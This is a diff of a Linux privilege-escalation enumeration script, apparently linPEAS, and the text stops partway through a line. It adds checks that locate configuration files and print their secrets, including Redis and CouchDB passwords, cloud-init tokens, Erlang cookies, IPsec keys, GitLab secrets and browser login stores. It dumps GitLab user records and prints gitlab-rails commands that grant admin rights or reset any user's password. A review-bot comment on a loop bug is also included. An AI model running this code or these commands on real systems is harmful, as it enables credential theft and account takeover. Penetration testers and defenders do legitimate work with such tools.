@@ -1975,14 +2164,14 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) Knock printf $Y"[+] "$GREEN"Searching Knock configuration\n"$NC - Knock=$(echo "$FIND_ETC" | grep -E '/etc/init.d/.*knockd.*') + Knock=$(echo "$FIND_ETC\n$FIND_MNT" | grep -E '/etc/init.d/.*knockd.*') if [ "$Knock" ]; then printf "$Knock\n" | while read f; do h=$(grep -R -i "defaults_file=" $f | cut -b 15-) ##Search string to know where is the default knock file - example - DEFAULTS_FILE=/etc/default/knockd i=$(grep -R -i "please edit" $h | awk '{print $4}') ##Search string to know where is config file - example - # PLEASE EDIT /etc/knockd.conf BEFORE ENABLING j=$(grep -R -i "sequence" $i) ##If we want we can show sequence number - 'hidded' - printf "Config Knock file found!: \n$i\n" | sed -E "s,.*,${C}[1;31m&${C}[0m," - printf " Sequence found!: \n$j\n" | sed -E "s,.*,${C}[1;31m&${C}[0m," + printf "Config Knock file found!: \n$i\n" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + printf " Sequence found!: \n$j\n" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," done else echo_not_found "Knock.config" fi 
@@ -1990,16 +2179,16 @@ if [ "`echo $CHECKS | grep SofI`" ]; then ##-- SI) Logstash printf $Y"[+] "$GREEN"Searching logstash files\n"$NC - logstash=$(echo "$FIND_DIR_VAR $FIND_DIR_ETC $FIND_DIR_HOME $FIND_DIR_ROOT $FIND_DIR_TMP $FIND_DIR_USR $FIND_DIR_OPT $FIND_DIR_USERS $FIND_DIR_PRIVATE $FIND_DIR_APPLICATIONS" | grep -E 'logstash') + logstash=$(echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_USERS\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MNT" | grep -E 'logstash') if [ "$logstash" ]; then printf "$logstash\n" printf "$logstash\n" | while read d; do if [ -r "$d/startup.options" ]; then echo "Logstash is running as user:" - cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed -E "s,$USER,${C}[1;95m&${C}[0m," | sed -E "s,root,${C}[1;31m&${C}[0m," + cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed -${E} "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,root,${C}[1;31m&${C}[0m," fi - cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -E "s,exec\W*\{|command\W*=>,${C}[1;31m&${C}[0m," - cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -E"s,path\W*=>|code\W*=>|ruby\W*\{,${C}[1;31m&${C}[0m," + cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -${E} "s,exec\W*\{|command\W*=>,${C}[1;31m&${C}[0m," + cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -${E} "s,path\W*=>|code\W*=>|ruby\W*\{,${C}[1;31m&${C}[0m," done else echo_not_found fi 
@@ -2007,7 +2196,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) Elasticsearch printf $Y"[+] "$GREEN"Searching elasticsearch files\n"$NC - elasticsearch=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'elasticsearch\.y.*ml') + elasticsearch=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'elasticsearch\.y.*ml') if [ "$elasticsearch" ]; then printf "$elasticsearch\n" printf "$elasticsearch\n" | while read f; do @@ -2022,13 +2211,13 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) Vault-ssh printf $Y"[+] "$GREEN"Searching Vault-ssh files\n"$NC - vaultssh=$(echo "$FIND_ETC $FIND_USR $FIND_HOME $FIND_ROOT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'vault-ssh-helper\.hcl') + vaultssh=$(echo "$FIND_ETC\n$FIND_USR\n$FIND_HOME\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'vault-ssh-helper\.hcl') if [ "$vaultssh" ]; then printf "$vaultssh\n" printf "$vaultssh\n" | while read f; do cat "$f" 2>/dev/null; vault-ssh-helper -verify-only -config "$f" 2>/dev/null; done echo "" vault secrets list 2>/dev/null - echo "$FIND_ETC $FIND_USR $FIND_HOME $FIND_ROOT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '\.vault-token' | sed -E "s,.*,${C}[1;31m&${C}[0m," 2>/dev/null + echo "$FIND_ETC\n$FIND_HOME\n$FIND_USR\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E '\.vault-token' | sed -${E} "s,.*,${C}[1;31m&${C}[0m," 2>/dev/null else echo_not_found "vault-ssh-helper.hcl" fi echo "" 
@@ -2047,30 +2236,30 @@ if [ "`echo $CHECKS | grep SofI`" ]; then printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions\n"$NC screensess=`screen -ls 2>/dev/null` if [ "$screensess" ]; then - printf "$screensess" | sed -E "s,.*,${C}[1;31m&${C}[0m," | sed -E "s,No Sockets found.*,${C}[32m&${C}[0m," + printf "$screensess" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," | sed -${E} "s,No Sockets found.*,${C}[32m&${C}[0m," else echo_not_found "screen" fi echo "" #-- SI) Tmux sessions tmuxdefsess=`tmux ls 2>/dev/null` - tmuxnondefsess=`ps aux | grep "tmux " | grep -v grep` + tmuxnondefsess=`ps auxwww | grep "tmux " | grep -v grep` printf $Y"[+] "$GREEN"Searching tmux sessions\n"$N printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions\n"$NC if [ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ]; then - printf "$tmuxdefsess\n$tmuxnondefsess\n" | sed -E "s,.*,${C}[1;31m&${C}[0m," | sed -E "s,no server running on.*,${C}[32m&${C}[0m," + printf "$tmuxdefsess\n$tmuxnondefsess\n" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m," else echo_not_found "tmux" fi echo "" #-- SI) Couchdb printf $Y"[+] "$GREEN"Searching Couchdb directory\n"$NC - couchdb_dirs=$(echo "$FIND_DIR_VAR $FIND_DIR_ETC $FIND_DIR_HOME $FIND_DIR_ROOT $FIND_DIR_TMP $FIND_DIR_USR $FIND_DIR_OPT $FIND_DIR_USERS $FIND_DIR_PRIVATE $FIND_DIR_APPLICATIONS" | grep -E 'couchdb') + couchdb_dirs=$(echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_USERS\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MNT" | grep -E 'couchdb') printf "$couchdb_dirs\n" | while read d; do for f in `find $d -name local.ini 2>/dev/null`; do if [ -r "$f" ]; then echo "Found readable $f" - cat "$f" | grep -v "^;" | grep -v "^$" | sed -E "s,admin.*|password.*|cert_file.*|key_file.*|hashed.*|pbkdf2.*,${C}[1;31m&${C}[0m," 2>/dev/null + cat "$f" | grep -v "^;" | grep -v "^$" | 
sed -${E} "s,admin.*|password.*|cert_file.*|key_file.*|hashed.*|pbkdf2.*,${C}[1;31m&${C}[0m," 2>/dev/null fi done done @@ -2078,11 +2267,11 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) Redis printf $Y"[+] "$GREEN"Searching redis.conf\n"$NC - redisconfs=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'redis\.conf$') + redisconfs=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'redis\.conf$') printf "$redisconfs\n" | while read f; do if [ -r "$f" ]; then echo "Found readable $f" - cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -E "s,masterauth.*|requirepass.*,${C}[1;31m&${C}[0m," 2>/dev/null + cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -${E} "s,masterauth.*|requirepass.*,${C}[1;31m&${C}[0m," 2>/dev/null fi done echo "" 
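Review bot: In the couchdb loop, when `$couchdb_dirs` is empty `printf "$couchdb_dirs\n"` still emits one blank line, `read d` sets an empty `d`, and the backtick-wrapped `find $d -name local.ini 2>/dev/null` then runs `find` with no starting point, which on GNU and busybox find means a recursive search of the current directory; the redis loop in the next hunk guards its work with `[ -r "$f" ]`, this loop has no such guard on `$d`. Wrapping the `for` in `if [ -d "$d" ]; then … fi` (or prefixing the pipeline with `[ "$couchdb_dirs" ] &&`) avoids the stray search. `tmuxnondefsess=` now uses `ps auxwww` but keeps the self-matching `grep "tmux " | grep -v grep` idiom; `grep "[t]mux "` gives the same result with one process fewer.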
@@ -2098,103 +2287,318 @@ if [ "`echo $CHECKS | grep SofI`" ]; then df=$(echo $d |cut -d ':' -f1) dp=$(echo $d |cut -d ':' -f2-) echo "Found possible PLAIN text creds in $df" - echo "$dp" | sed -E "s,.*,${C}[1;31m&${C}[0m," 2>/dev/null + echo "$dp" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," 2>/dev/null done fi echo "" #-- SI) Mosquitto printf $Y"[+] "$GREEN"Searching mosquitto.conf\n"$NC - mqttconfs=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'mosquitto\.conf$') + mqttconfs=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'mosquitto\.conf$') printf "$mqttconfs" | while read f; do if [ -r "$f" ]; then echo "Found readable $f" - cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -E "s,password_file.*|psk_file.*|allow_anonymous.*true|auth,${C}[1;31m&${C}[0m," 2>/dev/null + cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -${E} "s,password_file.*|psk_file.*|allow_anonymous.*true|auth,${C}[1;31m&${C}[0m," 2>/dev/null fi done echo "" #-- SI) Neo4j printf $Y"[+] "$GREEN"Searching neo4j auth file\n"$NC - neo4j=$(echo "$FIND_DIR_VAR $FIND_DIR_ETC $FIND_DIR_HOME $FIND_DIR_ROOT $FIND_DIR_TMP $FIND_DIR_USR $FIND_DIR_OPT $FIND_DIR_USERS $FIND_DIR_PRIVATE $FIND_DIR_APPLICATIONS" | grep -E 'neo4j') + neo4j=$(echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_USERS\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MNT" | grep -E 'neo4j') printf "$neo4j\n" | while read d; do if [ -r "$d" ]; then echo "Found readable $d" - find $d -type f -name "auth" -exec cat {} \; 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m," 2>/dev/null + find $d -type f -name "auth" -exec cat {} \; 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," 2>/dev/null fi done echo "" #-- SI) Cloud-Init printf $Y"[+] "$GREEN"Searching 
Cloud-Init conf file\n"$NC - cloudcfg=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'cloud\.cfg$') + cloudcfg=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'cloud\.cfg$') printf "$cloudcfg\n" | while read f; do if [ -r "$f" ]; then echo "Found readable $f" - cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | grep -E "consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy" | sed -E "s,consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy,${C}[1;31m&${C}[0m," + cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | grep -E "consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy" | sed -${E} "s,consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy,${C}[1;31m&${C}[0m," fi done echo "" ##-- SI) Erlang printf $Y"[+] "$GREEN"Searching Erlang cookie file\n"$NC - erlangcoo=$(echo "$FIND_ETC $FIND_HOME $FIND_ROOT $FIND_USR $FIND_VAR $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '.erlang.cookie$') + erlangcoo=$(echo "$FIND_ETC\n$FIND_HOME\n$FIND_USR\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E '.erlang.cookie$') printf "$erlangcoo\n" | while read f; do if [ -r "$f" ]; then echo "Found Erlang cookie: $f" - cat "$f" 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m," + cat "$f" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," fi done echo "" ##-- SI) GVM printf $Y"[+] "$GREEN"Searching GVM auth file\n"$NC - gvmconfs=$(echo "$FIND_HOME $FIND_ETC $FIND_ROOT $FIND_TMP $FIND_OTP $FIND_USR $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'gvm-tools\.conf') + 
gvmconfs=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_TMP\n$FIND_OTP\n$FIND_USR\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'gvm-tools\.conf') printf "$gvmconfs\n" | while read f; do if [ -r "$f" ]; then echo "Found GVM auth file: $f" - cat "$f" 2>/dev/null | sed -E "s,username.*|password.*,${C}[1;31m&${C}[0m," + cat "$f" 2>/dev/null | sed -${E} "s,username.*|password.*,${C}[1;31m&${C}[0m," fi done echo "" - IPSEC_RELEVANT_NAMES="ipsec.secrets ipsec.conf" - - ##-- SI) IPSEC printf $Y"[+] "$GREEN"Searching IPSEC files\n"$NC - ipsecconfs=$(echo "$FIND_HOME $FIND_ETC $FIND_ROOT $FIND_TMP $FIND_OTP $FIND_USR $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'ipsec\.secrets|ipsec\.conf') + ipsecconfs=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_TMP\n$FIND_OTP\n$FIND_USR\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'ipsec\.secrets|ipsec\.conf') printf "$ipsecconfs\n" | while read f; do if [ -r "$f" ]; then echo "Found IPSEC file: $f" - cat "$f" 2>/dev/null | sed -E "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${C}[1;31m&${C}[0m," + cat "$f" 2>/dev/null | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${C}[1;31m&${C}[0m," fi done echo "" ##-- SI) IRSSI printf $Y"[+] "$GREEN"Searching IRSSI files\n"$NC - irssifols=$(echo "$FIND_VAR $FIND_HOME $FIND_ETC $FIND_ROOT $FIND_OTP $FIND_USR $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '.irssi') + irssifols=$(echo "$FIND_DIR_VAR\n$FIND_DIR_HOME\n$FIND_DIR_ETC\n$FIND_DIR_OTP\n$FIND_DIR_USR\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MNT" | grep -E '.irssi') printf "$irssifols\n" | while read d; do if [ -r "$d/config" ]; then echo "Found IRSSI config file: $d/config" - cat "$d/config" 2>/dev/null | sed -E "s,password.*,${C}[1;31m&${C}[0m," + cat "$d/config" 2>/dev/null | sed -${E} "s,password.*,${C}[1;31m&${C}[0m," fi done echo "" ##-- SI) Keyring printf $Y"[+] "$GREEN"Searching Keyring files\n"$NC - keyringsfilesfolds=$(echo "$FIND_DIR_VAR $FIND_DIR_ETC $FIND_DIR_HOME $FIND_DIR_ROOT $FIND_DIR_TMP 
$FIND_DIR_USR $FIND_DIR_OPT $FIND_DIR_USERS $FIND_DIR_PRIVATE $FIND_DIR_APPLICATIONS $FIND_HOME $FIND_ETC $FIND_ROOT $FIND_VAR $FIND_USR $FIND_MNT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'keyrings|*\.keyring|*\.keystore') + keyringsfilesfolds=$(echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_USERS\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_MNT\n$FIND_USR\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E 'keyrings|*\.keyring$|*\.keystore$') printf "$keyringsfilesfolds\n" | sort | uniq | while read f; do if [ -f "$f" ]; then echo "Keyring file: $f" | sed "s,$f,${C}[1;31m&${C}[0m," elif [ -d "$f" ]; then echo "Keyring folder: $f" | sed "s,$f,${C}[1;31m&${C}[0m," - ls -lR "$f" 2>/dev/null | sed -E "s,keyrings|\.keyring|\.keystore,${C}[1;31m&${C}[0m," + ls -lR "$f" 2>/dev/null | sed -${E} "s,keyrings|\.keyring|\.keystore,${C}[1;31m&${C}[0m," fi done echo "" + + ##-- SI) Filezilla + printf $Y"[+] "$GREEN"Searching Filezilla sites file\n"$NC + filezillaconfs=$(echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_OPT\n$FIND_DIR_MNT" | grep -E 'filelliza') + printf "$filezillaconfs\n" | uniq | while read f; do + if [ -d "$f" ]; then + echo "Found Filezilla folder: $f" + if [ -f "$f/sitemanager.xml" ]; then + cat "$f/sitemanager.xml" 2>/dev/null | sed -${E} "s,Host.*|Port.*|Protocol.*|User.*|Pass.*,${C}[1;31m&${C}[0m," + fi + fi + done + echo "" + + ##-- SI) BACKUP-MANAGER + printf $Y"[+] "$GREEN"Searching backup-manager files\n"$NC + backupmanager=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_OPT\n$FIND_MNT\n$FIND_USR\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E 'storage.php|database.php') + printf "$backupmanager\n" | sort | uniq | while read f; do + if [ -f "$f" ]; then + echo "backup-manager file: $f" | sed "s,$f,${C}[1;31m&${C}[0m," + cat "$f" 2>/dev/null | grep "'pass'|'password'|'user'|'database'|'host'" | sed -${E} 
"s,password|pass|user|database|host,${C}[1;31m&${C}[0m," + fi + done + echo "" + + ##-- SI) passwd files (splunk) + printf $Y"[+] "$GREEN"Searching uncommon passwd files (splunk)\n"$NC + splunkpwd=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_TMP\n$FIND_OPT\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -v "/etc/passwd$" | grep -E 'passwd$') + SPLUNK_BIN="`command -v splunk 2>/dev/null`" + if [ "$SPLUNK_BIN" ]; then echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${C}[1;31m&${C}[0m,"; fi + printf "$splunkpwd\n" | sort | uniq | while read f; do + if [ -f "$f" ] && ! [ -x "$f" ]; then + echo "passwd file: $f" | sed "s,$f,${C}[1;31m&${C}[0m," + cat "$f" 2>/dev/null | grep "'pass'|'password'|'user'|'database'|'host'|\$" | sed -${E} "s,password|pass|user|database|host|\$,${C}[1;31m&${C}[0m," + fi + done + echo "" + + ##-- SI) Gitlab + printf $Y"[+] "$GREEN"Searching GitLab related files\n"$NC + #Check gitlab-rails + if [ "`command -v gitlab-rails`" ]; then + echo "gitlab-rails was found. Trying to dump users..." 
+ gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -${E} "s,email|password,${C}[1;31m&${C}[0m," + echo "If you have enough privileges, you can make an account under your control administrator by running: gitlab-rails runner 'user = User.find_by(email: \"youruser@example.com\"); user.admin = TRUE; user.save!'" + echo "Alternatively, you could change the password of any user by running: gitlab-rails runner 'user = User.find_by(email: \"admin@example.com\"); user.password = \"pass_peass_pass\"; user.password_confirmation = \"pass_peass_pass\"; user.save!'" + echo "" + fi + if [ "`command -v gitlab-backup`" ]; then + echo "If you have enough privileges, you can create a backup of all the repositories inside gitlab using 'gitlab-backup create'" + echo "Then you can get the plain-text with something like 'git clone \@hashed/19/23/14348274[...]38749234.bundle'" + echo "" + fi + #Check gitlab files + gitlabfiles=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_TMP\n$FIND_OPT\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -v "/lib" | grep -E "secrets.yml$|gitlab.yml$|gitlab.rb$") + printf "$gitlabfiles\n" | sort | uniq | while read f; do + if [ "`echo $f | grep secrets.yml`" ]; then + echo "Found $f" | sed "s,$f,${C}[1;31m&${C}[0m," + cat "$f" 2>/dev/null | grep -v "^$" | grep -v "^#" + elif [ "`echo $f | grep gitlab.yml`" ]; then + echo "Found $f" | sed "s,$f,${C}[1;31m&${C}[0m," + cat "$f" | grep -A 4 "repositories:" + elif [ "`echo $f | grep gitlab.rb`" ]; then + echo "Found $f" | sed "s,$f,${C}[1;31m&${C}[0m," + cat "$f" | grep -v "^$" | grep -v "^#" | sed -${E} "s,email|user|password,${C}[1;31m&${C}[0m," + fi + echo "" + done + echo "" + + ##-- SI) PGP/GPG + printf $Y"[+] "$GREEN"Searching PGP/GPG\n"$NC + pgpg=$(echo "$FIND_HOME\n$FIND_PRIVATE\n$FIND_MNT" | grep -E '\.pgp$|\.gpg$|.gnupg') + if [ "$pgpg" ]; then echo "PGP/GPG files found:" ; + printf "$pgpg\n" | sort | uniq | while read f; 
do + if [ -f "$f" ]; then + ls -l "$f" + else + ls -ld "$f" + ls -l "$f" 2>/dev/null + fi + done + echo "" + fi + echo "PGP/GPG software:" + command -v gpg 2>/dev/null || echo_not_found "gpg" + gpg --list-keys 2>/dev/null + command -v netpgpkeys 2>/dev/null || echo_not_found "netpgpkeys" + netpgpkeys --list-keys 2>/dev/null + command -v netpgp 2>/dev/null || echo_not_found "netpgp" + echo "" + + ##-- SI) vi swp files + printf $Y"[+] "$GREEN"Searching vim files\n"$NC + vimfiles=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_TMP\n$FIND_OPT\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E "\.swp$|\.viminfo$") + printf "$vimfiles\n" | sort | uniq | while read f; do + ls -l "$f" 2>/dev/null + done + echo "" + + ##-- SI) containerd installed + printf $Y"[+] "$GREEN"Checking if containerd(ctr) is available\n"$NC + printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation\n"$NC + containerd=`command -v ctr` + if [ "$containerd" ]; then + echo "ctr was found in $containerd, you may be able to escalate privileges with it" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + ctr image list + fi + echo "" + + ##-- SI) runc installed + printf $Y"[+] "$GREEN"Checking if runc is available\n"$NC + printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation\n"$NC + runc=`command -v runc` + if [ "$runc" ]; then + echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + fi + echo "" + + #-- SI) Docker + printf $Y"[+] "$GREEN"Searching docker files\n"$NC + printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket\n"$NC + dockerfiles=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_TMP\n$FIND_OPT\n$FIND_USR\n$FIND_MNT\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E 'docker.socket|docker.sock|Dockerfile|docker-compose.yml') + printf "$dockerfiles\n" | 
while read f; do + ls -l "$f" 2>/dev/null + if [ -S "$f" ] && [ -w "$f" ]; then + echo "Docker socket file ($f) is writable" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," + fi + done + echo "" + + #-- SI) Firefox files + printf $Y"[+] "$GREEN"Interesting Firefox Files\n"$NC + printf $B"[i] "$Y"https://book.hacktricks.xyz/forensics/basic-forensics-esp/browser-artifacts#firefox\n"$NC + firefoxdirs=$(echo "$FIND_DIR_HOME" | grep -E '\.mozilla') + printf "$firefoxdirs\n" | while read f; do + if [ "$f" ]; then + echo "Found $f" + find "$f" -name "places.sqlite" -o -name "bookmarkbackups" -o -name "formhistory.sqlite" -o -name "handlers.json" -o -name "persdict.dat" -o -name "addons.json" -o -name "cookies.sqlite" -o -name "cache2" -o -name "startupCache" -o -name "favicons.sqlite" -o -name "prefs.js" -o -name "downloads.sqlite" -o -name "thumbnails" -o -name "logins.json" -o -name "key4.db" -o -name "key3.db" 2>/dev/null | sort + fi + done + echo "" + + #-- SI) Chrome files + printf $Y"[+] "$GREEN"Interesting Chrome Files\n"$NC + printf $B"[i] "$Y"https://book.hacktricks.xyz/forensics/basic-forensics-esp/browser-artifacts#firefox\n"$NC + chromedirs=$(echo "$FIND_DIR_HOME" | grep -E 'google-chrome') + printf "$chromedirs\n" | while read f; do + if [ "$f" ]; then + echo "Found $f" + find "$f" -name "History" -o -name "Cookies" -o -name "Cache" -o -name "Bookmarks" -o -name "Web Data" -o -name "Favicons" -o -name "Login Data" -o -name "Current Session" -o -name "Current Tabs" -o -name "Last Session" -o -name "Last Tabs" -o -name "Extensions" -o -name "Thumbnails" 2>/dev/null | sort + fi + done + echo "" + + #-- SI) Autologin files + printf $Y"[+] "$GREEN"Autologin Files\n"$NC + autologinfiles=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_MNT" | grep -E 'autologin|autologin.conf') + printf "$autologinfiles\n" | while read f; do + echo "$f" + ls -l "$f" 2>/dev/null | sed "s,passwd,${C}[1;31m&${C}[0m," + cat "$f" 2>/dev/null | sed "s,passwd,${C}[1;31m&${C}[0m," + echo "" + 
done + echo "" + + #-- SI) S/Key athentication + printf $Y"[+] "$GREEN"S/Key authentication\n"$NC + if [ "`grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep skey`" ]; then + printf "System supports$RED S/Key$NC authentication\n" + if ! [ -d /etc/skey/ ]; then + echo "${GREEN}S/Key authentication enabled, but has not been initialized" + elif [ -w /etc/skey/ ]; then + echo "${RED}/etc/skey/ is writable by you" + ls -ld /etc/skey/ + else + ls -ld /etc/skey/ 2>/dev/null + fi + fi + echo "" + + #-- SI) YubiKey athentication + printf $Y"[+] "$GREEN"YubiKey authentication\n"$NC + if [ "`grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep yubikey`" ]; then + printf "System supports$RED YubiKey$NC authentication\n" + if [ -w /var/db/yubikey/ ]; then + echo "${RED}/var/db/yubikey/ is writable by you" + ls -ld /var/db/yubikey/ + else + ls -ld /var/db/yubikey/ 2>/dev/null + fi + fi + echo "" + + #-- SI) Passwords inside pam.d + printf $Y"[+] "$GREEN"Passwords inside pam.d\n"$NC + grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${C}[1;31m&${C}[0m," + echo "" + + #-- SI) FastCGI params + printf $Y"[+] "$GREEN"FastCGI Params\n"$NC + fastcgi_paramsfiles=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_TMP\n$FIND_OPT\n$FIND_USR\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E 